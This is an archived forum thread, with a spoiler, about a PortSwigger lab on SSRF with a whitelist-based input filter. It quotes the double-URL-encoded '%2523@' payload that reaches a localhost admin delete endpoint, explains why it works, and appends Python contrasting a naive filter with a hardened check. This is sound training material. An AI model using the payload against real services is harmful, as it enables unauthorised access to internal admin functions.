The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


[SPOILER] "Lab: SSRF with whitelist-based input filter" explanation?

Jorrit | Last updated: Jul 21, 2021 11:12PM UTC

Hi! I do not understand why the payload "http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos" works in this lab.

I think I understand this part: the filter only URL decodes a single time, which makes the username localhost%23, which is still accepted by the filter. The code that handles the backend request recursively URL decodes, which makes the requested URL http://localhost#@stock.weliketoshop.net/admin/delete?username=carlos. Please correct me if I did not explain it correctly.

The part I do not understand is how the path /admin/delete?username=carlos gets appended to http://localhost to get http://localhost/admin/delete?username=carlos. Can someone please explain this to me?

Thank you!

Kind Regards,
Jorrit Wegman

Uthman, PortSwigger Agent | Last updated: Jul 22, 2021 09:23AM UTC

'http://localhost#@stock.weliketoshop.net/admin/delete?username=carlos' and 'http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos' look different to the server. You will notice that the second is double URL-encoded and this results in a 500 internal server error, whilst the former request results in a 400 response. The lab is essentially telling you that '#' is parsed differently when it is double URL-encoded as %2523. '/admin/delete?username=carlos' is just added to access the admin console and delete the user.

Jorrit | Last updated: Jul 22, 2021 11:25AM UTC

Thank you for the response. I understand why /admin/delete is added, but I do not understand how it's still in the path even though it is placed after the '#' character.

Uthman, PortSwigger Agent | Last updated: Jul 23, 2021 08:40AM UTC

Since the username is only parsed when the '#' is double-URL encoded, the URL becomes http://localhost:80/admin/delete?username=carlos. The server extracts the hostname and validates it against a whitelist, so http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos becomes http://localhost:80/admin/delete?username=carlos to the server. Unfortunately, we do not provide 1-1 support for the academy, but this post will remain up if anyone else wants to contribute with some further input!

Harshit | Last updated: Jul 24, 2021 04:07AM UTC

I think there is another filter that strips everything from %25 until it sees / and the remaining part concatenates, which leads to http://localhost/admin.
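The parser differential the thread is circling around, as an added example that is not the lab's or PortSwigger's code: a constructed allowlist check that URL-decodes once and takes the text after '@' as the host, beside a constructed backend that decodes until the string stops changing and then parses with urllib, where '#' ends the authority. The hardened check is also a constructed illustration; it only shows the host discrepancy and does not claim to reproduce how the lab's backend rebuilds the path.

```python
from urllib.parse import unquote, urlsplit

# Constructed allowlist for the illustration; mirrors the lab's permitted host.
ALLOWED_HOSTS = {"stock.weliketoshop.net"}


def naive_filter_host(url: str) -> str:
    """Weak check: single URL-decode (%2523 -> %23 only), then take the text
    after the last '@' in the authority as the host."""
    decoded = unquote(url)
    authority = decoded.split("://", 1)[1].split("/", 1)[0]
    return authority.rsplit("@", 1)[-1].split(":", 1)[0]


def fully_decode(url: str) -> str:
    """Decode repeatedly until stable, mimicking a backend that decodes
    recursively (%2523 -> %23 -> '#')."""
    while True:
        decoded = unquote(url)
        if decoded == url:
            return decoded
        url = decoded


def backend_host(url: str) -> str:
    """Host a standards-based parser sees after full decoding: '#' terminates
    the authority, so '@stock...' is pushed into the fragment."""
    return urlsplit(fully_decode(url)).hostname or ""


def hardened_check(url: str) -> bool:
    """Constructed safer check: decode once, parse with a real URL parser,
    refuse ambiguity (userinfo, fragment, leftover percent-escapes in the
    authority), then validate the parsed hostname instead of a substring."""
    parsed = urlsplit(unquote(url))
    if parsed.scheme != "http" or parsed.username is not None or parsed.fragment:
        return False
    if "%" in parsed.netloc:
        return False
    return parsed.hostname in ALLOWED_HOSTS


# The payload quoted in the thread and a benign stock-check URL from the lab.
PAYLOAD = "http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos"
BENIGN = "http://stock.weliketoshop.net/product/stock/check?productId=1&storeId=1"

if __name__ == "__main__":
    print("filter sees host:", naive_filter_host(PAYLOAD))   # stock.weliketoshop.net
    print("backend sees host:", backend_host(PAYLOAD))       # localhost
    print("hardened accepts payload:", hardened_check(PAYLOAD))  # False
    print("hardened accepts benign:", hardened_check(BENIGN))    # True
```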
